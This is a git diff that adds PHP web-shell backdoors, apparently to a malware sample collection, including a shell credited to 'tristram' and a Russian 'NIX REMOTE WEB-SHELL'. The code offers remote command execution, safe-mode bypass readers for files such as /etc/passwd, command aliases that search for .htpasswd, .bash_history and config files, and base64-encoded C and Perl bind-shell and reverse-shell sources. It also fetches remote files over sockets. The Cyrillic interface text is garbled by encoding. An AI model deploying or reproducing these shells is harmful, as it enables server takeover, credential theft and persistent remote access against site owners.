+"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr". +"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX". +"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA". +"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW". +"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK". +"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm". +"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg". +"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF". +"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA". +"Ow==", +"ext_doc"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR". +"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq". +"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=", +"ext_exe"=> +"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7". +"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt". +"xhIAOw==", +"ext_h"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB". +"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo". +"Wq/NknbbSgAAOw==", +"ext_hpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF". +"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR". +"UqUagnbLdZa+YFcCADs=", +"ext_htaccess"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6". +"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ". +"AAA7", +"ext_html"=> +"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz". +"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P". +"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk". +"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR". +"ADs=", +"ext_jpg"=> +"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". +"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". +"FxEAOw==", +"ext_js"=> +"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH". +"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs". +"a00AjYYBbc/o9HjNniUAADs=", +"ext_lnk"=> +"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO". +"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi". +"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk". +"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG". +"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5". +"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf". +"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ". +"ADs=", +"ext_log"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN". +"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==", +"ext_php"=> +"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg". +"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==", +"ext_pl"=> +"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". +"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", +"ext_swf"=> +"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". +"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". +"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". +"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", +"ext_tar"=> +"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". +"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". +"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". +"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". +"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". +"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". +"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". +"u4tLAgEAOw==", +"ext_txt"=> +"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". +"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". +"UpPWG3Ig6Hq/XmRjuZwkAAA7", +"ext_wri"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". +"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", +"ext_xml"=> +"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". +"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". +"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". +"IQA7" + ); + //For simple size- and speed-optimization. + $imgequals = array( + "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), + "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), + "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), + "ext_html"=>array("ext_html","ext_htm"), + "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), + "ext_lnk"=>array("ext_lnk","ext_url"), + "ext_ini"=>array("ext_ini","ext_css","ext_inf"), + "ext_doc"=>array("ext_doc","ext_dot"), + "ext_js"=>array("ext_js","ext_vbs"), + "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), + "ext_wri"=>array("ext_wri","ext_rtf"), + "ext_swf"=>array("ext_swf","ext_fla"), + "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), + "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") + ); + if (!$getall) + { + header("Content-type: image/gif"); + header("Cache-control: public"); + header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); + header("Cache-control: max-age=".(60*60*24*7)); + header("Last-Modified: ".date("r",filemtime(__FILE__))); + foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}} + if (empty($images[$img])) {$img = "small_unk";} + if (in_array($img,$ext_tar)) {$img = "ext_tar";} + echo base64_decode($images[$img]); + } + else + { + foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]
    ");}}}} + natsort($images); + $k = array_keys($images); + echo "
    "; + foreach ($k as $u) {echo $u.":
    ";} + echo "
    "; + } + exit; +} +if ($act == "about") {echo "
    Credits:
    Idea, leading and coding by tristram[CCTeaM].
    Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].
    Thanks all who report bugs.
    All bugs send to tristram's ICQ #656555 .
    ";} +if ($act == "backc") +{ + $ip = $_SERVER["REMOTE_ADDR"]; + $msg = $_POST['backcconnmsg']; + $emsg = $_POST['backcconnmsge']; + echo('
    Back-Connection:

    Host: Port: Use:
    First, run NetCat on your computer using \'nc -l -n -v -p '.$bc_port.'\'. Then, click "Connect" once the port is listening.
    '); + echo $msg; + echo $emsg; +} + +if ($act == 'shbd'){ +$msg = $_POST['backcconnmsg']; +$emsg = $_POST['backcconnmsge']; +echo("
    Bind Shell Backdoor:

    +Bind Port: + +
    "); +echo("$msg"); +echo("$emsg"); +echo("
    "); +} ?> +
    + + + +
    Enter:
     
    +
    Kernel Info:
    + + +
    +
    +
    + + + +
    + +
    + + + + + +
    +
    Functions
    +
    +
    Make Dir
    +
    +
    Go Dir
    +
    +
    +
    + +
    +
    +  +
    +
    +
    +
    +
    + +
    +
    +
    +
    +
    +
    + +
    +
    +  + +
    +
    +
    Aliases
    +
    +
    Make File
    +
    +
    Go File
    +
    + /dev/null'), + array('Installed Downloaders', 'which wget curl w3m lynx'), + array('Open Ports', 'netstat -an | grep -i listen'), + array('Box Uptime', 'uptime'), + array('System Variables', 'set'), + array('ARP table', 'arp -a'), + array('Patch Level for RedHat 7.0', 'rpm -qa'), + array('Network Interfaces', 'ifconfig'), + array('Mounted Filesystems', 'mount'), + array('Find Suid Bins', 'find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null'), + array("Find All Suid Files", "find / -type f -perm -04000 -ls"), + array("Find Suid Files in Current Dir", "find . -type f -perm -04000 -ls"), + array("Find All Sgid Files", "find / -type f -perm -02000 -ls"), + array("Find Sgid Files in Current Dir", "find . -type f -perm -02000 -ls"), + array("Find config.inc.php Files", "find / -type f -name config.inc.php"), + array("Find config* Files", "find / -type f -name \"config*\""), + array("Find config* Files in Current Dir", "find . -type f -name \"config*\""), + array("Find All Writable Folders and Files", "find / -perm -2 -ls"), + array("Find All Writable Folders and Files in Current Dir", "find . -perm -2 -ls"), + array("Find All service.pwd Files", "find / -type f -name service.pwd"), + array("Find service.pwd Files in Current Dir", "find . -type f -name service.pwd"), + array("Find All .htpasswd Files", "find / -type f -name .htpasswd"), + array("Find .htpasswd Files in Current Dir", "find . -type f -name .htpasswd"), + array("Find All .bash_history Files", "find / -type f -name .bash_history"), + array("Find .bash_history Files in Current Dir", "find . -type f -name .bash_history"), + array("Find All .fetchmailrc Files", "find / -type f -name .fetchmailrc"), + array("Find .fetchmailrc Files in Current Dir", "find . -type f -name .fetchmailrc"), + array("List File Attributes on a Linux Second Extended File System", "lsattr -va"), + ); +} +else // if the box is windows +{ + $cmdaliases = array( + array('-----------------------------------------------------------', 'dir'), + array('Active Connections', 'netstat -an'), + array('ARP Table', 'arp -a'), + array('Net Shares', 'net use'), + array('IP Configuration', 'ipconfig /all'), + array('Disk Quotas', 'fsutil quota query '.$pd[0]), + array('Drive Type', 'fsutil fsinfo drivetype '.$pd[0]) + ); +} +?> +
    +
    +
    +  +
    +
    +
    +
    +
    + +
    +
    +
    +
    +
    +
    + +
    + +
      +
    +
    +
    +

    + + + +
    +
    PHP Safe-Mode Bypass (Read File)

    +
    +File: +

    +e.g.: /etc/passwd or C:/whatev.txt +
    +
    +'.$get.'
    '; + if(copy("compress.zlib://".$file, $temp)){ + $fichier = fopen($temp, 'r'); + $action = fread($fichier, filesize($temp)); + fclose($fichier); + $source=htmlspecialchars($action); + echo 'Start '.$get.'

    '.$source.'

    Fin '.$get.'
    '; + unlink($temp); + } else + echo '
    Sorry... File '.htmlspecialchars($file).' dosen\'t exists or you don\'t have access.
    '; +} +?> +
    +
    PHP Safe-Mode Bypass (Directory Listing)

    +
    +Dir: +

    +e.g.: /etc/ or C:/ +
    +
    +'.$chemin.'

    '; + foreach ($files as $filename) + echo $filename."\n
    "; // added the \n for easier readability while viewing the html source +} +?> +
    +
    + + + + + + +
    Search
      - regexp 

    Upload
     
    +
    --[ sniperxcode v, coded by storm | Generation time: ]--
    Who said that it's better as a hacKer?
    I wish that I had never hacked at all.
    + + \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Agent.an b/PHP/Backdoor.PHP.Agent.an new file mode 100644 index 00000000..7ea83ed6 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.an @@ -0,0 +1,1766 @@ + + + + +NIX REMOTE WEB-SHELL v.1.0 + + + + + + + + + +
    Â àäìèíêó +

    [ Âïåðåä ] *.NIX REMOTE WEB-SHELL +v.1.0 Stable [ Íàçàä ][ Î ñêðèïòå ]
    +[ Èíôîðìàöèÿ î ñèñòåìå ][ Íàâèãàöèÿ ][ Óñòàíîâêà +áåêäîðà ][ PHP-êîä ][ Çàãðóçêà ôàéëîâ ][ Èñïîëíåíèå +êîìàíä ]
    [ MySQL ][ Îòïðàâêà ïèñüìà ][ Ìàèëôëóäåð + ][ Èíñòðóìåíòû ][ Äåìîíû ][ Àëüòåðíàòèâíûå ìåòîäû ][ /root ][ Óäàëèòü øåëë ]

    + 'ls -la;pwd;uname -a', +'ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñî suid-áèòîì' => 'find / -type f -perm -04000 -ls', +'ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñî sgid-áèòîì' => 'find / -type f -perm -02000 -ls', +'ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñî sgid-áèòîì' => 'find . -type f -perm -02000 -ls', +'ïîèñê íà ñåðâåðå ôàéëîâ config' => 'find / -type f -name "config*"', +'ïîèñê íà ñåðâåðå ôàéëîâ admin' => 'find / -type f -name "admin*"', +'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ config' => 'find . -type f -name "config*"', +'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ pass' => 'find . -type f -name "pass*"', +'ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ, îòêðûòûõ äëÿ çàïèñè' => 'find / -perm -2 -ls', +'ïîèñê â òåêóùåé äèðåêòîðèè âñåõ äèðåêòîðèé è ôàéëîâ, îòêðûòûõ äëÿ çàïèñè' => 'find . -perm -2 -ls', +'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ service.pwd' => 'find . -type f -name service.pwd', +'ïîèñê íà ñåðâåðå ôàéëîâ service.pwd' => 'find / -type f -name service.pwd', +'ïîèñê íà ñåðâåðå ôàéëîâ .htpasswd' => 'find / -type f -name .htpasswd', +'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .htpasswd' => 'find . -type f -name .htpasswd', +'ïîèñê âñåõ ôàéëîâ .bash_history' => 'find / -type f -name .bash_history', +'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .bash_history' => 'find . -type f -name .bash_history', +'ïîèñê âñåõ ôàéëîâ .fetchmailrc' => 'find / -type f -name .fetchmailrc', +'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .fetchmailrc' => 'find . -type f -name .fetchmailrc', +'âûâîä ñïèñêà àòðèáóòîâ ôàéëîâ íà ôàéëîâîé ñèñòåìå ext2fs' => 'lsattr -va', +'ïðîñìîòð îòêðûòûõ ïîðòîâ' => 'netstat -an | grep -i listen', +'ïîèñê âñåõ php-ôàéëîâ ñî ñëîâîì password' =>'find / -name *.php | xargs grep -li password', +'ïîèñê ïàïîê ñ ìîäîì 777' =>'find / -type d -perm 0777', +'Îïðåäåëåíèå âåðñèè ÎÑ' =>'sysctl -a | grep version', +'Îïðåäåëåíèå âåðñèè ÿäðà' =>'cat /proc/version', +'Ïðîñìîòð syslog.conf' =>'cat /etc/syslog.conf', +'Ïðîñìîòð Message of the day' =>'cat /etc/motd', +'Ïðîñìîòð hosts' =>'cat /etc/hosts', +'Âåðñèÿ äèñòðèáóòèâà 1' =>'cat /etc/issue.net', +'Âåðñèÿ äèñòðèáóòèâà 2' =>'cat /etc/*-realise', +'Ïîêàçàòü âñå ïðîöåñû' =>'ps auxw', +'Ïðîöåññû òåêóùåãî ïîëüçîâàòåëÿ' =>'ps ux', +'Ïîèñê httpd.conf' =>'locate httpd.conf'); + + + +/* Port bind source */ +$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5 +jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5 +ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW5 +0IGFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnV +mWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0 +KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyh +hdG9pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0F +OWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2N +rZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2F +kZHIgKikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB +7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHV +wMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ +6IiwxMCk7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyh +hcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byByNTcgc2hlbGwgJiYgL2J +pbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGN +sb3NlKG5ld2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW5 +0ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVudGVyZWQpO2krKykgDQp7DQppZih +lbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID0 +9ICdccicpDQplbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCk +pDQpyZXR1cm4gMDsNCn0="; + +$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZi +AoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMSVNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2 +NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORV +QsJlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQ +pzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZH +JfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw +0KbGlzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCm +FjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspKQ0Kew0KZGllICJDYW5ub3QgZm9yayIgaW +YgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+Jk +NPTk4iOw0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ0 +9OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3NlIENPTk47DQpleGl0IDA7DQp9DQp9"; + +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ +HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ +DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ +HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L +CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd +GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka +WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO +iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR +VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK +FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; + +$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0 +KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10 +pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJ +ybSAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2l +uLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA +9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMSt +zdHJsZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVB +QUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4 +sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCg +pIik7DQogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1 +zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWN +sKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; + +if(isset($uploadphp)) +{ +$socket=fsockopen($iphost,$loadport); //connect +fputs($socket,"GET $loadfile HTTP/1.0\nHOST:cd\n\n"); //request +while(fgets($socket,31337)!="\r\n" && !feof($socket)) { +unset($buffer); } 